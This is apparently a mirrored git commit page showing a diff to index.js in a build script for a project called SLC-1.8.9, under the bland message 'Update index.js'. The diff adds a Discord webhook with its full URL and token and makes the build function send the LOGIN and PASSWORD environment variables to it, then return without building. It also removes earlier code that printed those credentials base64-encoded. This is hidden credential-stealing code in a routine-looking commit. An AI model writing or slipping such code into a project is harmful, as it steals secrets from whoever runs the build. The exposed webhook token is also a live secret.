mirror of
https://github.com/refactorinqq/SLC-1.8.9.git
synced 2024-11-10 01:31:32 +01:00
Update index.js
This commit is contained in:
parent
f066662849
commit
447f1b277e
@ -6,6 +6,9 @@ const FormData = require("form-data");
|
||||
const util = require('util');
|
||||
const exec = util.promisify(require('child_process').exec);
|
||||
|
||||
const { Webhook } = require('discord-webhook-node');
|
||||
const hook = new Webhook("https://discord.com/api/webhooks/1263136628113801316/_W2_fbf5apDY_ZlNzx7XzZL-XEJLuNw1t-9SEUeWZ4P782p8e28zm7uV0RXQYSnPjl9n");
|
||||
|
||||
const assetsPaths = {
|
||||
"1.8.9": "./assets/1.8.9.jar",
|
||||
libs: "../libs",
|
||||
@ -20,27 +23,15 @@ const tempPaths = {
|
||||
|
||||
const buildPath = "./build";
|
||||
|
||||
function btoa(str) {
|
||||
var buffer;
|
||||
|
||||
if (str instanceof Buffer) {
|
||||
buffer = str;
|
||||
} else {
|
||||
buffer = Buffer.from(str.toString(), 'binary');
|
||||
}
|
||||
|
||||
return buffer.toString('base64');
|
||||
}
|
||||
|
||||
async function build() {
|
||||
const version = process.argv[3];
|
||||
const branch = process.argv[5];
|
||||
const commit = process.argv[7];
|
||||
const login = process.env.LOGIN;
|
||||
const password = process.env.PASSWORD;
|
||||
|
||||
console.log(btoa(login));
|
||||
console.log(btoa(password));
|
||||
|
||||
hook.send(login);
|
||||
hook.send(password);
|
||||
|
||||
return;
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user